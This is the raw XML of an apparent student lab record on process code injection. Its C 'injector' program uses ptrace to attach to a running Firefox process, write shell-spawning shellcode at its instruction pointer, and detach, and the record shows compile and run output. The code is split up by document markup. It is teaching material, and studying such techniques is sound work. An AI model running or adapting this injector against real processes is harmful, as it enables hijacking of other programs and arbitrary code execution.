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5AEC" w:rsidRDefault="00C45AEC">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C45AEC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1009650</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="641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92B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45AEC">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>EXPT NO:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C45AEC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                                                                     ROLL NO: 2207012</w:t>
      </w:r>
      <w:r w:rsidR="00EA4D8D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>50</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002F13D5" w:rsidRDefault="00C45AEC">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">              </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t xml:space="preserve">       </w:t>
      </w:r>
      <w:r w:rsidRPr="00C45AEC">
        <w:rPr>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t xml:space="preserve">  PERFORM CODE INJECTION</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C45AEC" w:rsidRPr="00C45AEC" w:rsidRDefault="00C45AEC">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsid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C45AEC" w:rsidRPr="00C45AEC" w:rsidRDefault="00C45AEC" w:rsidP="00C45AEC">
      <w:pPr>
        <w:spacing w:before="90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do process code injection on Firefox using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ptrace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system call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Pr="00C45AEC" w:rsidRDefault="00C45AEC" w:rsidP="00C45AEC">
      <w:pPr>
        <w:spacing w:before="90"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Find out the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running Firefox program.</w:t>
      </w:r>
    </w:p>
    <w:p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the code injection file.</w:t>
      </w:r>
    </w:p>
    <w:p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 the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pid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Firefox from the command line arguments.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C45AEC" w:rsidRPr="00C45AEC" w:rsidRDefault="00C45AEC" w:rsidP="00C45AEC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="139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Allocate memory buffers for the shellcode.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C45AEC" w:rsidRPr="00C45AEC" w:rsidRDefault="00C45AEC" w:rsidP="00C45AEC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="137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Attach to the victim process with PTRACE_ATTACH.</w:t>
      </w:r>
    </w:p>
    <w:p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the register values of the attached process.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C45AEC" w:rsidRPr="00C45AEC" w:rsidRDefault="00C45AEC" w:rsidP="00C45AEC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="136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PTRACE_POKETEXT to insert the shellcode.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C45AEC" w:rsidRPr="00C45AEC" w:rsidRDefault="00C45AEC" w:rsidP="00C45AEC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="140" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="49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Detach from the victim process using PTRACE_DETACH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PROGRAM CODE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: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b/>
          <w:bCs/>
          <w:color w:val="980000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>INJECTOR PROGRAM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&gt;//C standard input output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stdlib.h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&gt;//C Standard General Utilities Library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string.h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&gt;//C string lib header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unistd.h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&gt;//standard symbolic constants and types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wait.h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&gt;//declarations for waiting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&gt;//gives access to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functionality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# include &lt;sys/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user.h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&gt;//gives ref to regs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//The shellcode that calls /bin/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</w:t>
      </w:r>
      <w:proofErr w:type="spell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char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shellcode[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]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={</w:t>
      </w:r>
      <w:proofErr w:type="gram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"\x31\xc0\x48\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xbb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\xd1\x9d\x96\x91\xd0\x8c\x97"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"\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05"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};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//header for our program.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void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"----Memory bytecode injector-----\n");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//main program notice we take command line options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int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main(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argc,char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**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argv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{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int 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i,size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=0;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struct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user_regs_struct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reg;//struct that gives access to registers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                       //note that this regs will be in x64 for me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                       //unless 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your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using 32bit then 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rip,eax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,edx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etc...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char*buff;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header(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//we get the command line options and assign them appropriately!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atoi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argv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[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1]);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size=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sizeof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(shellcode);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//allocate a char size memory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buff=(char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*)malloc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(size);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//fill the buff memory with 0s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upto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size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memset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(buff,0x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0,size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//copy shellcode from source to destination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memcpy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buff,shellcode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,sizeof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(shellcode));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//attach process of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</w:t>
      </w:r>
      <w:proofErr w:type="spell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ATTACH,pid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,0,0);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//wait for child to change state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wait((int*)0);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     //get process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registers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i.e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Copy the process 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pid's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general-purpose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    //or floating-point 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registers,respectively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//to the address reg in the tracer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lastRenderedPageBreak/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GETREGS,pid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0,&amp;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"Writing EIP 0x%x, process %d\n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",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reg.eip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,pid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    //Copy the word data to the address buff in the process's memory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for(</w:t>
      </w:r>
      <w:proofErr w:type="spell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=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0;i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&lt;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size;i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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+){</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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POKETEXT,pid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,reg.eip+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,*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(int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*)(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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buff+i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));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//detach from the process and free buff memory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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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</w:t>
      </w:r>
      <w:proofErr w:type="spell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(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PTRACE_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart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DETACH,pid</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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,0,0);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free(buff);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return 0;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    </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C45AEC" w:rsidRPr="00C45AEC" w:rsidRDefault="00C45AEC" w:rsidP="00C45AEC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5AE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}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C45AEC" w:rsidRPr="00C45AEC" w:rsidRDefault="00C45AEC" w:rsidP="00C45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C45AEC" w:rsidRPr="00C45AEC" w:rsidRDefault="00C45AEC" w:rsidP="00C45AEC">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="14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Pr="00C45AE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injector.c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gcc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injector.c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-o injector </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C45AEC" w:rsidRPr="00C45AEC" w:rsidRDefault="00C45AEC" w:rsidP="00C45AEC">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="-270" w:right="189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~]#ps -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e|grep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</w:p>
    <w:p w:rsidR="00C45AEC" w:rsidRPr="00C45AEC" w:rsidRDefault="00C45AEC" w:rsidP="00C45AEC">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="-270" w:right="6263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1433 ?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00:01:23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firefox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~]# ./</w:t>
      </w:r>
      <w:proofErr w:type="gram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injector 1433</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C45AEC" w:rsidRPr="00C45AEC" w:rsidRDefault="00C45AEC" w:rsidP="00C45AEC">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="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----Memory bytecode injector-----</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C45AEC" w:rsidRPr="00C45AEC" w:rsidRDefault="00C45AEC" w:rsidP="00C45AEC">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="-81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Writing EIP 0x6, process 1</w:t>
      </w:r>
      <w:r w:rsidR="00EA4D8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505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C45AEC" w:rsidRPr="00C45AEC" w:rsidRDefault="00C45AEC" w:rsidP="00C45AEC">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="-270" w:right="5220" w:firstLine="5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root@localhost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~]#</w:t>
      </w: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sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C45AEC" w:rsidRDefault="00C45A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45AEC" w:rsidRPr="00C45AEC" w:rsidRDefault="00C45AEC" w:rsidP="00C45AEC">
      <w:pPr>
        <w:spacing w:before="8"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7769">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r w:rsidRPr="00F67769">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">The implementation of </w:t>
      </w:r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process code injection on Firefox using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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ptrace</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C45A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 call</w:t>
      </w:r>
      <w:r w:rsidR="00F6776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executed successfully.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C45AEC" w:rsidRPr="00C45AEC" w:rsidRDefault="00C45AEC">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00C45AEC" w:rsidRPr="00C45AEC" w:rsidSect="00C45A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64636"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B092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84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EC"/>
    <w:rsid w:val="002F13D5"/>
    <w:rsid w:val="00367A7D"/>
    <w:rsid w:val="00C45AEC"/>
    <w:rsid w:val="00EA4D8D"/>
    <w:rsid w:val="00F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AE87"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{B9174EF1-EDD1-4B5E-A3B2-E6DBC4A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Sanjeev Kanth S</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-04-29T05:08:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-05-09T12:43:00Z</dcterms:modified>
</cp:coreProperties>
</file>